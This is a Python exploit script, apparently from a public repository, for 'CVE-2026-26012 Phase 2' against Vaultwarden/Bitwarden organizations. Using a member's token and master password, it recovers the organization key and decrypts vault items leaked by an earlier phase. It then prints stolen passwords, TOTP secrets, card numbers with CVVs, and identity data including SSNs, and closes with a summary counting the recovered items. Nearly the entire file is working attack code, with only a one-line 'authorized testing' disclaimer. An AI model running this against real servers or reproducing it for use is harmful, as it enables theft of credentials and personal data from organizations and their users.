README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2026-26012 — Phase 2: Organization Key Recovery & Cipher Decryption
========================================================================
This script completes the exploitation chain by:
1. Retrieving the encrypted org key (any member already has it)
2. Deriving the decryption chain from the master password
3. Decrypting the leaked ciphers from Phase 1
Bitwarden/Vaultwarden encryption model:
Master Password + Email
→ (PBKDF2 or Argon2) → Master Key
→ (HKDF-Expand) → Stretched Key (encKey 32B || macKey 32B)
→ (AES-256-CBC) → User Symmetric Key [from /api/sync profile.key]
→ (AES-256-CBC) → RSA Private Key [from /api/sync profile.privateKey]
→ (RSA-OAEP-SHA1) → Organization Key [from /api/sync profile.organizations[].key]
→ (AES-256-CBC) → Decrypted cipher data
Key insight: the organization key is shared with ALL members. The collection
access control is purely server-side. Any member who has the org key can
decrypt any cipher in the org — the CVE provides the missing ciphers.
Requirements:
pip install cryptography
pip install argon2-cffi (optional, only if KDF is Argon2id)
Usage:
# Full chain: fetch keys + decrypt leaked export
python3 poc_decrypt.py \
--url https://vw.example.com \
--token "eyJhbG..." \
--email [email protected] \
--master-password "MyPassword" \
--org-id "org-uuid" \
--leaked-json results.json
# Just decrypt (if you already have the org key in hex)
python3 poc_decrypt.py \
--org-key-hex "aabbccdd..." \
--leaked-json results.json
Disclaimer: Authorized security testing only.
"""
import argparse
import json
import sys
import base64
import hashlib
import hmac as hmac_mod
import ssl
import urllib.request
import urllib.error
import os
from typing import Tuple, Optional
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding, hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding as asym_padding
from cryptography.hazmat.primitives.kdf.hkdf import HKDFExpand
try:
import argon2.low_level
HAS_ARGON2 = True
except ImportError:
HAS_ARGON2 = False
# ═════════════════════════════════════════════
# 1. EncString Parser
# ═════════════════════════════════════════════
# Bitwarden EncString types:
# 0 = AES-256-CBC (no HMAC — legacy, rare)
# 1 = AES-128-CBC + HMAC-SHA256
# 2 = AES-256-CBC + HMAC-SHA256 (most common for cipher fields)
# 3 = RSA-2048-OAEP-SHA256
# 4 = RSA-2048-OAEP-SHA1 (used for org key encryption)
class EncString:
"""Parsed Bitwarden encrypted string."""
def __init__(self, raw: str):
self.raw = raw
self.enc_type = None
self.iv = None
self.ct = None
self.mac = None
self._parse(raw)
def _parse(self, raw: str):
if not raw or not isinstance(raw, str):
raise ValueError(f"Invalid EncString: {raw!r}")
# Format: "TYPE.DATA" where DATA is "IV|CT|MAC" or just "CT"
dot_idx = raw.index(".")
self.enc_type = int(raw[:dot_idx])
data = raw[dot_idx + 1:]
if self.enc_type in (0, 1, 2, 5, 6):
# Symmetric: IV|CT|MAC
parts = data.split("|")
self.iv = base64.b64decode(parts[0])
self.ct = base64.b64decode(parts[1])
if len(parts) > 2 and parts[2]:
self.mac = base64.b64decode(parts[2])
elif self.enc_type in (3, 4):
# Asymmetric: just CT
self.ct = base64.b64decode(data)
else:
raise ValueError(f"Unknown EncString type: {self.enc_type}")
def __repr__(self):
return f"EncString(type={self.enc_type}, ct={len(self.ct)}B)"
# ═════════════════════════════════════════════
# 2. Crypto Operations
# ═════════════════════════════════════════════
def decrypt_aes_cbc(ct: bytes, iv: bytes, enc_key: bytes,
mac_key: bytes = None, mac: bytes = None) -> bytes:
"""Decrypt AES-256-CBC with optional HMAC-SHA256 verification."""
# Verify HMAC if present
if mac and mac_key:
computed = hmac_mod.new(mac_key, iv + ct, hashlib.sha256).digest()
if not hmac_mod.compare_digest(computed, mac):
raise ValueError("HMAC verification failed — wrong key or corrupted data")
cipher = Cipher(algorithms.AES(enc_key), modes.CBC(iv))
decryptor = cipher.decryptor()
padded = decryptor.update(ct) + decryptor.finalize()
# Remove PKCS7 padding
unpadder = padding.PKCS7(128).unpadder()
return unpadder.update(padded) + unpadder.finalize()
def decrypt_enc_string(enc_str: EncString, enc_key: bytes, mac_key: bytes) -> bytes:
"""Decrypt a symmetric EncString (type 0, 1, 2)."""
if enc_str.enc_type not in (0, 1, 2):
raise ValueError(f"Expected symmetric EncString, got type {enc_str.enc_type}")
return decrypt_aes_cbc(
ct=enc_str.ct,
iv=enc_str.iv,
enc_key=enc_key,
mac_key=mac_key,
mac=enc_str.mac,
)
def decrypt_rsa_oaep(ct: bytes, private_key, sha_version: int = 1) -> bytes:
"""Decrypt RSA-OAEP (SHA-1 or SHA-256)."""
if sha_version == 1:
hash_algo = hashes.SHA1()
else:
hash_algo = hashes.SHA256()
return private_key.decrypt(
ct,
asym_padding.OAEP(
mgf=asym_padding.MGF1(algorithm=hash_algo),
algorithm=hash_algo,
label=None,
),
)
def decrypt_enc_string_rsa(enc_str: EncString, private_key) -> bytes:
"""Decrypt an asymmetric EncString (type 3, 4)."""
sha_version = 1 if enc_str.enc_type == 4 else 256
return decrypt_rsa_oaep(enc_str.ct, private_key, sha_version)
# ═════════════════════════════════════════════
# 3. Key Derivation Chain
# ═════════════════════════════════════════════
def derive_master_key(password: str, email: str,
kdf_type: int, kdf_iterations: int,
kdf_memory: int = None,
kdf_parallelism: int = None) -> bytes:
"""
Derive the master key from master password + email.
KDF type 0 = PBKDF2-SHA256
KDF type 1 = Argon2id
"""
if kdf_type == 0:
return hashlib.pbkdf2_hmac(
"sha256",
password.encode("utf-8"),
email.lower().encode("utf-8"),
kdf_iterations,
dklen=32,
)
elif kdf_type == 1:
if not HAS_ARGON2:
print("[!] Argon2id KDF detected but argon2-cffi is not installed.")
print(" Install with: pip install argon2-cffi")
sys.exit(1)
# Salt = SHA-256 of lowercase email (raw 32 bytes)
salt = hashlib.sha256(email.lower().encode("utf-8")).digest()
# CRITICAL: Bitwarden API returns kdfMemory in MiB.
# argon2-cffi memory_cost is in KiB. Must convert: MiB * 1024 = KiB
memory_kib = (kdf_memory or 64) * 1024
raw = argon2.low_level.hash_secret_raw(
secret=password.encode("utf-8"),
salt=salt,
time_cost=kdf_iterations,
memory_cost=memory_kib,
parallelism=kdf_parallelism or 4,
hash_len=32,
type=argon2.low_level.Type.ID,
)
return raw
else:
raise ValueError(f"Unknown KDF type: {kdf_type}")
def stretch_key_hkdf(master_key: bytes) -> Tuple[bytes, bytes]:
"""
Modern stretching: HKDF-Expand-SHA256 with info="enc"/"mac".
Used by Bitwarden clients since ~2021+.
"""
enc_key = HKDFExpand(
algorithm=hashes.SHA256(), length=32, info=b"enc"
).derive(master_key)
mac_key = HKDFExpand(
algorithm=hashes.SHA256(), length=32, info=b"mac"
).derive(master_key)
return enc_key, mac_key
def stretch_key_legacy(master_key: bytes) -> Tuple[bytes, bytes]:
"""
Legacy stretching: HMAC-based key expansion.
Used by older Bitwarden clients (pre-HKDF).
"""
enc_key = hmac_mod.new(master_key, master_key + b"\x01", hashlib.sha256).digest()
mac_key = hmac_mod.new(master_key, enc_key + b"\x02", hashlib.sha256).digest()
return enc_key, mac_key
def try_decrypt_user_key(encrypted_key_str: str, master_key: bytes,
debug: bool = False) -> Tuple[bytes, bytes, str]:
"""
Try multiple strategies to decrypt the user symmetric key.
Returns (enc_key, mac_key, strategy_name) on success.
Raises ValueError if all strategies fail.
Strategies tried in order:
1. HKDF-Expand stretched key (modern Bitwarden)
2. Legacy HMAC-based stretched key (older Bitwarden)
3. Raw master key as enc_key, no MAC (very old accounts, type 0)
4. HKDF stretched key, skip HMAC verification (fallback)
5. Legacy stretched key, skip HMAC verification (fallback)
"""
enc_str = EncString(encrypted_key_str)
if debug:
print(f" [debug] User key EncString type: {enc_str.enc_type}")
print(f" [debug] IV: {enc_str.iv.hex()[:16]}... ({len(enc_str.iv)}B)")
print(f" [debug] CT: {enc_str.ct.hex()[:16]}... ({len(enc_str.ct)}B)")
print(f" [debug] MAC: {enc_str.mac.hex()[:16] if enc_str.mac else 'None'}..."
f" ({len(enc_str.mac) if enc_str.mac else 0}B)")
strategies = []
# Strategy 1: HKDF stretch (modern)
hkdf_enc, hkdf_mac = stretch_key_hkdf(master_key)
strategies.append(("HKDF-Expand (modern)", hkdf_enc, hkdf_mac, True))
# Strategy 2: Legacy HMAC stretch
legacy_enc, legacy_mac = stretch_key_legacy(master_key)
strategies.append(("HMAC-based stretch (legacy)", legacy_enc, legacy_mac, True))
# Strategy 3: Raw master key (very old accounts, usually type 0)
strategies.append(("Raw master key (no stretch)", master_key, None, False))
# Strategy 4 & 5: Same as 1 & 2 but skip HMAC (last resort)
strategies.append(("HKDF-Expand, skip HMAC", hkdf_enc, hkdf_mac, False))
strategies.append(("HMAC-stretch, skip HMAC", legacy_enc, legacy_mac, False))
errors = []
for name, enc_key, mac_key, verify_hmac in strategies:
try:
if debug:
print(f" [debug] Trying: {name}")
print(f" [debug] enc_key: {enc_key.hex()[:16]}...")
if mac_key:
print(f" [debug] mac_key: {mac_key.hex()[:16]}...")
# Determine if we should verify HMAC
effective_mac = enc_str.mac if (verify_hmac and mac_key) else None
effective_mac_key = mac_key if (verify_hmac and enc_str.mac) else None
raw = decrypt_aes_cbc(
ct=enc_str.ct,
iv=enc_str.iv,
enc_key=enc_key,
mac_key=effective_mac_key,
mac=effective_mac,
)
# Validate the decrypted key length
if len(raw) == 64:
result_enc, result_mac = raw[:32], raw[32:]
elif len(raw) == 32:
result_enc, result_mac = raw, raw
else:
raise ValueError(f"Unexpected decrypted key length: {len(raw)} bytes")
# Quick sanity check: try to use the key to decrypt something small
# (the key should look like random bytes, not padding errors)
if all(b == 0 for b in raw):
raise ValueError("Decrypted key is all zeros")
if debug:
print(f" [debug] SUCCESS → {len(raw)}B key")
return result_enc, result_mac, name
except Exception as e:
errors.append((name, str(e)))
if debug:
print(f" [debug] FAILED: {e}")
continue
# All strategies failed
print("\n[!] All key derivation strategies failed:")
for name, err in errors:
print(f" ✗ {name}: {err}")
print("\n Possible causes:")
print(" 1. Incorrect master password")
print(" 2. Incorrect email (case matters for the salt)")
print(" 3. Account uses an unsupported KDF configuration")
print(" 4. The profile.key was re-encrypted with a method not yet supported")
print("\n Try with --debug for detailed diagnostics")
raise ValueError("Could not decrypt user symmetric key with any known strategy")
def decrypt_user_private_key(encrypted_pk_str: str,
user_enc: bytes,
user_mac: bytes):
"""
Decrypt the user's RSA private key from profile.privateKey.
Returns an RSA private key object.
"""
enc_str = EncString(encrypted_pk_str)
der_bytes = decrypt_enc_string(enc_str, user_enc, user_mac)
return serialization.load_der_private_key(der_bytes, password=None)
def decrypt_org_key(encrypted_org_key_str: str,
private_key) -> Tuple[bytes, bytes]:
"""
Decrypt the organization key from profile.organizations[].key.
This is RSA-OAEP encrypted (type 4 = SHA-1).
Returns (org_enc_key, org_mac_key) — 32 bytes each.
"""
enc_str = EncString(encrypted_org_key_str)
raw = decrypt_enc_string_rsa(enc_str, private_key)
if len(raw) == 64:
return raw[:32], raw[32:]
else:
raise ValueError(f"Unexpected org key length: {len(raw)} bytes")
# ═════════════════════════════════════════════
# 4. Cipher Decryption
# ═════════════════════════════════════════════
def safe_decrypt_field(value: Optional[str], enc_key: bytes, mac_key: bytes) -> Optional[str]:
"""Attempt to decrypt a single cipher field. Returns None on failure."""
if not value or not isinstance(value, str):
return None
try:
enc_str = EncString(value)
raw = decrypt_enc_string(enc_str, enc_key, mac_key)
return raw.decode("utf-8", errors="replace")
except Exception as e:
return f"[DECRYPT_ERROR: {e}]"
def decrypt_cipher(cipher: dict, org_enc: bytes, org_mac: bytes) -> dict:
"""Decrypt all fields of a single cipher using the org key."""
result = {
"id": cipher.get("id", cipher.get("Id")),
"type": cipher.get("type", cipher.get("Type")),
"collectionIds": cipher.get("collectionIds", cipher.get("CollectionIds", [])),
"revisionDate": cipher.get("revisionDate", cipher.get("RevisionDate")),
}
# Decrypt top-level fields
result["name"] = safe_decrypt_field(
cipher.get("name", cipher.get("Name")), org_enc, org_mac
)
result["notes"] = safe_decrypt_field(
cipher.get("notes", cipher.get("Notes")), org_enc, org_mac
)
# Decrypt custom fields
fields = cipher.get("fields", cipher.get("Fields")) or []
result["fields"] = []
for f in fields:
result["fields"].append({
"name": safe_decrypt_field(
f.get("name", f.get("Name")), org_enc, org_mac
),
"value": safe_decrypt_field(
f.get("value", f.get("Value")), org_enc, org_mac
),
"type": f.get("type", f.get("Type")),
})
# Type-specific decryption
cipher_type = result["type"]
if cipher_type == 1: # Login
login = cipher.get("login", cipher.get("Login")) or {}
result["login"] = {
"username": safe_decrypt_field(
login.get("username", login.get("Username")), org_enc, org_mac
),
"password": safe_decrypt_field(
login.get("password", login.get("Password")), org_enc, org_mac
),
"totp": safe_decrypt_field(
login.get("totp", login.get("Totp")), org_enc, org_mac
),
}
# Decrypt URIs
uris = login.get("uris", login.get("Uris")) or []
result["login"]["uris"] = []
for u in uris:
result["login"]["uris"].append(
safe_decrypt_field(
u.get("uri", u.get("Uri")), org_enc, org_mac
)
)
elif cipher_type == 2: # Secure Note
# Notes are already in the top-level "notes" field
pass
elif cipher_type == 3: # Card
card = cipher.get("card", cipher.get("Card")) or {}
result["card"] = {
"cardholderName": safe_decrypt_field(
card.get("cardholderName", card.get("CardholderName")), org_enc, org_mac
),
"brand": safe_decrypt_field(
card.get("brand", card.get("Brand")), org_enc, org_mac
),
"number": safe_decrypt_field(
card.get("number", card.get("Number")), org_enc, org_mac
),
"expMonth": safe_decrypt_field(
card.get("expMonth", card.get("ExpMonth")), org_enc, org_mac
),
"expYear": safe_decrypt_field(
card.get("expYear", card.get("ExpYear")), org_enc, org_mac
),
"code": safe_decrypt_field(
card.get("code", card.get("Code")), org_enc, org_mac
),
}
elif cipher_type == 4: # Identity
identity = cipher.get("identity", cipher.get("Identity")) or {}
id_fields = [
"title", "firstName", "middleName", "lastName",
"company", "email", "phone", "ssn", "passportNumber",
"licenseNumber", "address1", "address2", "address3",
"city", "state", "postalCode", "country", "username",
]
result["identity"] = {}
for field in id_fields:
# Handle both camelCase and PascalCase
pascal = field[0].upper() + field[1:]
val = identity.get(field, identity.get(pascal))
result["identity"][field] = safe_decrypt_field(val, org_enc, org_mac)
# Attachments (metadata only — downloading requires separate API calls)
attachments = cipher.get("attachments", cipher.get("Attachments")) or []
if attachments:
result["attachments"] = []
for att in attachments:
result["attachments"].append({
"id": att.get("id", att.get("Id")),
"fileName": safe_decrypt_field(
att.get("fileName", att.get("FileName")), org_enc, org_mac
),
"size": att.get("size", att.get("Size")),
"sizeName": att.get("sizeName", att.get("SizeName")),
})
return result
# ═════════════════════════════════════════════
# 5. HTTP Client (reused from Phase 1)
# ═════════════════════════════════════════════
class VWClient:
def __init__(self, base_url: str, verify_ssl: bool = True):
self.base_url = base_url.rstrip("/")
self.auth_header = None
self.cookie_header = None
self.ssl_ctx = None
if not verify_ssl:
self.ssl_ctx = ssl.create_default_context()
self.ssl_ctx.check_hostname = False
self.ssl_ctx.verify_mode = ssl.CERT_NONE
def set_bearer_token(self, token: str):
token = token.strip()
if token.lower().startswith("bearer "):
token = token[7:]
self.auth_header = f"Bearer {token}"
def set_cookie(self, cookie: str):
self.cookie_header = cookie.strip()
def get(self, path: str) -> dict:
url = f"{self.base_url}{path}"
req = urllib.request.Request(url)
req.add_header("Accept", "application/json")
if self.auth_header:
req.add_header("Authorization", self.auth_header)
if self.cookie_header:
req.add_header("Cookie", self.cookie_header)
kwargs = {"context": self.ssl_ctx} if self.ssl_ctx else {}
try:
with urllib.request.urlopen(req, **kwargs) as resp:
body = resp.read()
if not body or len(body.strip()) == 0:
raise RuntimeError("Empty response")
decoded = body.decode("utf-8", errors="replace")
if decoded.strip().startswith("<"):
raise RuntimeError("Got HTML instead of JSON (invalid auth?)")
return json.loads(decoded)
except urllib.error.HTTPError as e:
body = e.read().decode(errors="replace")
raise RuntimeError(f"HTTP {e.code}: {body[:300]}")
# ═════════════════════════════════════════════
# 6. Key Recovery from API
# ═════════════════════════════════════════════
def fetch_sync_data(client: VWClient) -> dict:
"""Fetch /api/sync which contains all encrypted keys."""
return client.get("/api/sync?excludeDomains=true")
def fetch_prelogin(client: VWClient, email: str) -> dict:
"""Fetch KDF parameters."""
url = f"{client.base_url}/api/accounts/prelogin"
data = json.dumps({"email": email}).encode()
req = urllib.request.Request(url, data=data, method="POST")
req.add_header("Content-Type", "application/json")
kwargs = {"context": client.ssl_ctx} if client.ssl_ctx else {}
with urllib.request.urlopen(req, **kwargs) as resp:
return json.loads(resp.read())
def recover_org_key(client: VWClient, email: str, master_password: str,
org_id: str, debug: bool = False) -> Tuple[bytes, bytes]:
"""
Full key recovery chain:
master_password → master_key → [stretch] → user_key → RSA_key → org_key
"""
print("\n[*] === Key Recovery Chain ===\n")
# Step 1: Get KDF parameters
print("[1/6] Fetching KDF parameters...")
prelogin = fetch_prelogin(client, email)
kdf_type = prelogin.get("kdf", prelogin.get("Kdf", 0))
kdf_iter = prelogin.get("kdfIterations", prelogin.get("KdfIterations", 600000))
kdf_mem = prelogin.get("kdfMemory", prelogin.get("KdfMemory"))
kdf_par = prelogin.get("kdfParallelism", prelogin.get("KdfParallelism"))
kdf_names = {0: "PBKDF2-SHA256", 1: "Argon2id"}
print(f" KDF: {kdf_names.get(kdf_type, f'unknown({kdf_type})')}, "
f"iterations: {kdf_iter}"
f"{f', memory: {kdf_mem} MiB' if kdf_mem else ''}"
f"{f', parallelism: {kdf_par}' if kdf_par else ''}")
if debug:
print(f" [debug] Raw prelogin response: {json.dumps(prelogin, indent=2)}")
# Step 2: Derive master key
print("[2/6] Deriving master key...")
master_key = derive_master_key(master_password, email, kdf_type, kdf_iter, kdf_mem, kdf_par)
print(f" Master key: {master_key[:4].hex()}...{master_key[-4:].hex()} "
f"({len(master_key)} bytes)")
# Step 3: Fetch encrypted keys from /api/sync
print("[3/6] Fetching encrypted keys from /api/sync...")
sync = fetch_sync_data(client)
profile = sync.get("profile", sync.get("Profile", {}))
enc_user_key = profile.get("key", profile.get("Key"))
enc_private_key = profile.get("privateKey", profile.get("PrivateKey"))
organizations = profile.get("organizations", profile.get("Organizations", []))
if debug:
print(f" [debug] profile.key (first 80 chars): {enc_user_key[:80] if enc_user_key else 'None'}...")
print(f" [debug] profile.privateKey length: {len(enc_private_key) if enc_private_key else 'None'}")
print(f" [debug] Organizations count: {len(organizations)}")
if not enc_user_key:
print("[!] Could not find encrypted user key in sync response")
sys.exit(1)
if not enc_private_key:
print("[!] Could not find encrypted private key in sync response")
sys.exit(1)
# Find the target org
target_org = None
for org in organizations:
oid = org.get("id", org.get("Id", ""))
if oid == org_id:
target_org = org
break
if not target_org:
print(f"[!] Organization {org_id} not found in user's profile")
print(f" Available orgs:")
for org in organizations:
oid = org.get("id", org.get("Id"))
oname = org.get("name", org.get("Name"))
print(f" - {oname} ({oid})")
sys.exit(1)
enc_org_key = target_org.get("key", target_org.get("Key"))
org_name = target_org.get("name", target_org.get("Name", "?"))
print(f" Organization: {org_name}")
print(f" Found encrypted user key, private key, and org key")
# Step 4: Decrypt user symmetric key (multi-strategy)
print("[4/6] Decrypting user symmetric key...")
user_enc, user_mac, strategy = try_decrypt_user_key(enc_user_key, master_key, debug=debug)
print(f" Strategy: {strategy}")
print(f" User enc key: {user_enc[:4].hex()}... ({len(user_enc)} bytes)")
print(f" User mac key: {user_mac[:4].hex()}... ({len(user_mac)} bytes)")
# Step 5: Decrypt RSA private key
print("[5/6] Decrypting RSA private key...")
try:
rsa_private = decrypt_user_private_key(enc_private_key, user_enc, user_mac)
except ValueError as e:
# If HMAC fails on the private key too, try without HMAC
if "HMAC" in str(e):
print(f" HMAC failed on private key, retrying without verification...")
enc_str = EncString(enc_private_key)
der_bytes = decrypt_aes_cbc(
ct=enc_str.ct, iv=enc_str.iv,
enc_key=user_enc, mac_key=None, mac=None,
)
rsa_private = serialization.load_der_private_key(der_bytes, password=None)
else:
raise
pk_size = rsa_private.key_size
print(f" RSA private key: {pk_size}-bit")
# Step 6: Decrypt org key with RSA
print("[6/6] Decrypting organization key...")
org_enc, org_mac = decrypt_org_key(enc_org_key, rsa_private)
print(f" Org enc key: {org_enc[:4].hex()}... ({len(org_enc)} bytes)")
print(f" Org mac key: {org_mac[:4].hex()}... ({len(org_mac)} bytes)")
print(f"\n[+] Organization key recovered successfully!")
print(f" Org key (hex): {(org_enc + org_mac).hex()}")
return org_enc, org_mac
# ═════════════════════════════════════════════
# 7. Pretty Printer
# ═════════════════════════════════════════════
TYPE_NAMES = {1: "Login", 2: "SecureNote", 3: "Card", 4: "Identity"}
def print_decrypted_cipher(cipher: dict, index: int):
"""Pretty-print a decrypted cipher."""
ctype = cipher.get("type", "?")
type_str = TYPE_NAMES.get(ctype, f"Unknown({ctype})")
print(f"\n ┌─ [{index}] {type_str}: {cipher.get('name', '?')}")
print(f" │ ID: {cipher.get('id', '?')}")
print(f" │ Collections: {cipher.get('collectionIds', [])}")
if cipher.get("notes"):
notes = cipher["notes"]
if len(notes) > 100:
notes = notes[:100] + "..."
print(f" │ Notes: {notes}")
if ctype == 1 and cipher.get("login"):
login = cipher["login"]
print(f" │ ┌─ Login")
if login.get("uris"):
for uri in login["uris"]:
if uri:
print(f" │ │ URL: {uri}")
print(f" │ │ Username: {login.get('username', '—')}")
print(f" │ │ Password: {login.get('password', '—')}")
if login.get("totp"):
print(f" │ │ TOTP: {login['totp']}")
print(f" │ └─")
elif ctype == 3 and cipher.get("card"):
card = cipher["card"]
print(f" │ ┌─ Card")
print(f" │ │ Holder: {card.get('cardholderName', '—')}")
print(f" │ │ Brand: {card.get('brand', '—')}")
print(f" │ │ Number: {card.get('number', '—')}")
print(f" │ │ Exp: {card.get('expMonth', '?')}/{card.get('expYear', '?')}")
print(f" │ │ CVV: {card.get('code', '—')}")
print(f" │ └─")
elif ctype == 4 and cipher.get("identity"):
ident = cipher["identity"]
print(f" │ ┌─ Identity")
for k, v in ident.items():
if v and v != "[DECRYPT_ERROR":
print(f" │ │ {k}: {v}")
print(f" │ └─")
if cipher.get("fields"):
print(f" │ ┌─ Custom fields")
for f in cipher["fields"]:
fname = f.get("name", "?")
fval = f.get("value", "—")
ftype = f.get("type", 0)
ftype_names = {0: "Text", 1: "Hidden", 2: "Boolean", 3: "Linked"}
print(f" │ │ [{ftype_names.get(ftype, '?')}] {fname} = {fval}")
print(f" │ └─")
if cipher.get("attachments"):
print(f" │ Attachments:")
for att in cipher["attachments"]:
print(f" │ - {att.get('fileName', '?')} ({att.get('sizeName', '?')})")
print(f" └─")
# ═════════════════════════════════════════════
# 8. Main
# ═════════════════════════════════════════════
def main():
banner = r"""
╔══════════════════════════════════════════════════════════╗
║ CVE-2026-26012 — Phase 2: Decrypt Leaked Ciphers ║
║ Org Key Recovery + AES-256-CBC Decryption ║
╚══════════════════════════════════════════════════════════╝
"""
print(banner)
parser = argparse.ArgumentParser(
description="CVE-2026-26012 Phase 2: Org key recovery & cipher decryption",
formatter_class=argparse.RawDescriptionHelpFormatter,
)
# Input: leaked ciphers
parser.add_argument("--leaked-json", required=True,
help="JSON file from Phase 1 (--output results.json)")
# Method A: Full chain (API + master password)
chain = parser.add_argument_group("Method A: Full recovery chain (API + master password)")
chain.add_argument("--url", help="Vaultwarden base URL")
chain.add_argument("--token", help="Bearer token")
chain.add_argument("--cookie", help="Session cookie")
chain.add_argument("--email", help="Account email")
chain.add_argument("--master-password", help="Master password (for key derivation)")
chain.add_argument("--org-id", help="Target organization UUID")
chain.add_argument("--no-verify-ssl", action="store_true",
help="Skip SSL verification")
# Method B: Direct org key
direct = parser.add_argument_group("Method B: Direct org key (skip recovery)")
direct.add_argument("--org-key-hex",
help="Organization key as hex (128 hex chars = 64 bytes: enc||mac)")
# Output
parser.add_argument("--output", help="Save decrypted results to JSON file")
parser.add_argument("--max-display", type=int, default=30,
help="Max ciphers to display (default: 30)")
parser.add_argument("--debug", action="store_true",
help="Show detailed intermediate values for troubleshooting")
args = parser.parse_args()
# ── Load leaked ciphers ──
print(f"[*] Loading leaked ciphers from {args.leaked_json}...")
with open(args.leaked_json, "r") as f:
leaked_data = json.load(f)
# Handle both Phase 1 export format and raw cipher arrays
if isinstance(leaked_data, dict):
ciphers = leaked_data.get("leaked_ciphers", [])
print(f" Source: {leaked_data.get('target', '?')}")
print(f" Org: {leaked_data.get('organization_id', '?')}")
elif isinstance(leaked_data, list):
ciphers = leaked_data
else:
print("[!] Unrecognized JSON format")
sys.exit(1)
print(f" Loaded {len(ciphers)} cipher(s) to decrypt")
if not ciphers:
print("[!] No ciphers to decrypt.")
sys.exit(0)
# ── Obtain org key ──
org_enc = None
org_mac = None
if args.org_key_hex:
# Method B: direct key
print(f"\n[*] Using provided organization key")
raw = bytes.fromhex(args.org_key_hex)
if len(raw) != 64:
print(f"[!] Org key must be 64 bytes (128 hex chars), got {len(raw)}")
sys.exit(1)
org_enc, org_mac = raw[:32], raw[32:]
print(f" Org enc key: {org_enc[:4].hex()}...")
print(f" Org mac key: {org_mac[:4].hex()}...")
elif args.url and args.master_password and args.email:
# Method A: full chain
client = VWClient(args.url, verify_ssl=not args.no_verify_ssl)
if args.token:
client.set_bearer_token(args.token)
elif args.cookie:
client.set_cookie(args.cookie)
else:
print("[!] Need --token or --cookie for API access")
sys.exit(1)
org_id = args.org_id
if not org_id:
# Try to get from the leaked JSON
org_id = leaked_data.get("organization_id") if isinstance(leaked_data, dict) else None
if not org_id:
print("[!] --org-id is required for Method A")
sys.exit(1)
org_enc, org_mac = recover_org_key(client, args.email, args.master_password, org_id,
debug=args.debug)
else:
print("[!] Provide either:")
print(" Method A: --url + --token + --email + --master-password + --org-id")
print(" Method B: --org-key-hex")
sys.exit(1)
# ── Decrypt all ciphers ──
print(f"\n[*] Decrypting {len(ciphers)} cipher(s)...\n")
decrypted = []
errors = 0
for i, cipher in enumerate(ciphers):
try:
dec = decrypt_cipher(cipher, org_enc, org_mac)
decrypted.append(dec)
except Exception as e:
errors += 1
dec = {
"id": cipher.get("id", cipher.get("Id")),
"error": str(e),
}
decrypted.append(dec)
# ── Display results ──
print(f"{'='*60}")
print(f" DECRYPTION RESULTS")
print(f"{'='*60}")
print(f" Total: {len(ciphers)}")
print(f" Decrypted: {len(decrypted) - errors}")
print(f" Errors: {errors}")
print(f"{'='*60}")
# Count by type
type_counts = {}
for d in decrypted:
if "error" not in d:
t = TYPE_NAMES.get(d.get("type"), "Unknown")
type_counts[t] = type_counts.get(t, 0) + 1
print(f"\n Breakdown:")
for t, count in sorted(type_counts.items()):
print(f" {t}: {count}")
# Print decrypted ciphers
display_count = min(len(decrypted), args.max_display)
for i, dec in enumerate(decrypted[:display_count], 1):
if "error" in dec:
print(f"\n [{i}] ERROR: {dec['error']} (cipher {dec.get('id', '?')})")
else:
print_decrypted_cipher(dec, i)
if len(decrypted) > display_count:
print(f"\n ... and {len(decrypted) - display_count} more. Use --output to see all.")
# ── Export ──
if args.output:
export = {
"vulnerability": "CVE-2026-26012",
"phase": "decryption",
"total_ciphers": len(ciphers),
"decrypted_count": len(decrypted) - errors,
"error_count": errors,
"org_key_enc_hex": org_enc.hex(),
"org_key_mac_hex": org_mac.hex(),
"decrypted_ciphers": decrypted,
}
with open(args.output, "w") as f:
json.dump(export, f, indent=2, ensure_ascii=False)
print(f"\n[+] Decrypted results saved to {args.output}")
# ── Summary ──
passwords = sum(1 for d in decrypted if d.get("login", {}).get("password"))
totps = sum(1 for d in decrypted if d.get("login", {}).get("totp"))
cards = sum(1 for d in decrypted if d.get("card", {}).get("number"))
print(f"\n{'='*60}")
print(f" IMPACT SUMMARY")
print(f"{'='*60}")
print(f" Passwords recovered: {passwords}")
print(f" TOTP secrets recovered: {totps}")
print(f" Card numbers recovered: {cards}")
print(f"{'='*60}")
print("\n[*] Done.")
return 0
if __name__ == "__main__":
sys.exit(main())